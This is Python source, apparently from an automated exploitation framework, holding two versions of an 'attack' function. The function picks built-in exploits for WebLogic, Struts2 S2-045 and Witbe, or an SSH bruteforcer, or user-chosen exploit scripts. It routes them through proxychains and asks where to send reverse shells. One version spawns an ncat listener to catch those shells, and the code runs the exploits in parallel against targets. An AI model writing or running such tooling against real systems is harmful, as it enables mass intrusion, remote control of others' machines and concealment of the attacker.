def attack():
'''
handles attack command
'''
if input_check('[?] Do you wish to use proxychains? [y/n] ',
choices=['y', 'n']) == 'y':
SessionParameters.USE_PROXY = True
else:
SessionParameters.USE_PROXY = False
answ = input_check('\n[?] Do you wish to use\
\n\n [a] built-in exploits\
\n [m] or launch your own manually?\
\n\n[=] Your choice: ',
choices=['a', 'm'])
if answ == 'a':
print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' +
colors.END + '\n')
print(console.BUILT_IN)
answ = input_check('[=] Your choice: ',
check_type=int,
choices=['0', '1', '2', '3', '4'])
try:
if answ == '2':
console.print_error("\n[-] Under development")
elif answ == '1':
console.print_error('\n[-] Under development')
elif answ == '0':
scanner(ExecExp.weblogic())
elif answ == '3':
scanner(ExecExp.s2_045())
elif answ == '4':
scanner(ExecExp.witbe())
except BaseException:
console.print_error("[-] We have an error executing exploit")
debug_except()
elif answ == 'm':
print(colors.CYAN + colors.UNDERLINE + colors.BOLD +
"\nWelcome, in here you can choose your own exploit\n" +
colors.END)
print(colors.CYAN + '[*] Here are available exploits:\n' + colors.END)
for poc in list_exp():
print(colors.BLUE + poc + colors.END)
exploit = input_check(
"\n[*] Enter the path (eg. joomla/rce.py) of your exploit: ",
choices=list_exp())
jobs = int(
input_check("[?] How many processes each time? ", check_type=int))
custom_args = []
answ = input_check("[?] Do you need a reverse shell [y/n]? ",
choices=['y', 'n'])
if answ == 'y':
lhost = input("[*] Where do you want me to send shells? ").strip()
lport = input_check(
"[*] and at what port? (make sure you have access to that port) ",
check_type=int)
custom_args = ['-l', lhost, '-p', lport]
answ = input_check(
'[*] Do you need me to start a listener? [y/n] ',
choices=['y', 'n'])
if answ == 'y':
print("\n[*] Spawning ncat listener in new window...\n")
try:
subprocess.Popen(args=[
"gnome-terminal",
"--command=ncat -nklvp " + lport + " -m 1000"
],
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except BaseException:
print(
colors.YELLOW +
"[-] Could not launch our listener, do you have GNOME-Terminal installed?"
+ colors.END + '\n')
else:
print(
"[*] Okay, just make sure you receive the reverse shells\n"
)
else:
pass
custom_args += input(
"[*] args for this exploit (target IP is handled already) ").strip(
).split()
exec_path = exploit.split('/')[1:]
work_path = exploit.split('/')[:-1]
delimtr = '/'
exec_path = delimtr.join(exec_path)
work_path = delimtr.join(work_path)
delimtr = ' '
print(
colors.BLUE + '[*] Your exploit will be executed like\n' +
colors.END,
'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(
exec_path), delimtr.join(custom_args))
scanner_args = (exploit, work_path, exec_path, custom_args, jobs)
scanner(scanner_args)
else:
console.print_error('[-] Invalid input')
def attack():
'''
handles attack command
'''
SESSION.use_proxy = input_check(
'[?] Do you wish to use proxychains? [y/n] ', choices=['y',
'n']) == 'y'
if SESSION.use_proxy:
if shutil.which("proxychains4") is None:
console.print_error("proxychains4 not found")
return
execute("proxy")
answ = input_check('\n[?] Do you wish to use\
\n\n [a] built-in exploits\
\n [m] or launch your own manually?\
\n\n[=] Your choice: ',
choices=['a', 'm'])
if answ == 'a':
print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' +
colors.END + '\n')
print(console.BUILT_IN)
answ = input_check('[=] Your choice: ',
check_type=int,
choices=['0', '1', '2', '3', '4'])
try:
if answ == '0':
scanner(exploit_exec.ssh_bruteforcer())
elif answ == '1':
scanner(exploit_exec.weblogic())
elif answ == '2':
console.print_error("[-] Not available")
elif answ == '3':
console.print_error("[-] Not available")
elif answ == '4':
scanner(exploit_exec.s2_045())
except (EOFError, KeyboardInterrupt, SystemExit):
return
elif answ == 'm':
print(colors.CYAN + colors.UNDERLINE + colors.BOLD +
"\nWelcome, in here you can choose your own exploit\n" +
colors.END)
colored_print('[*] Here are available exploits:\n', colors.CYAN)
for poc in list_exp():
colored_print(poc + colors.END, colors.BLUE)
exploit = input_check(
"\n[*] Enter the path (eg. joomla/rce.py) of your exploit: ",
choices=list_exp())
jobs = int(
input_check("[?] How many processes each time? ", check_type=int))
custom_args = []
answ = input_check("[?] Do you need a reverse shell [y/n]? ",
choices=['y', 'n'])
if answ == 'y':
lhost = input_check("[*] Where do you want me to send shells? ",
allow_blank=False,
ip_check=True)
lport = input_check("[*] and at what port?", check_type=int)
custom_args = ['-l', lhost, '-p', lport]
else:
pass
custom_args += input_check(
"[*] args for this exploit: ").strip().split()
# parse user's exploit name
exec_path = exploit.split('/')[1:]
work_path = exploit.split('/')[:-1]
exec_path = '/'.join(exec_path)
work_path = '/'.join(work_path)
# let user check if there's anything wrong
print(
colors.BLUE + '[*] Your exploit will be executed like\n' +
colors.END,
'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(
exec_path), ' '.join(custom_args))
# args as parameter for scanner
scanner_args = console.ScannerArgs(work_path, exec_path, custom_args,
jobs)
# start scanner
scanner(scanner_args)
else:
console.print_error('[-] Invalid input')
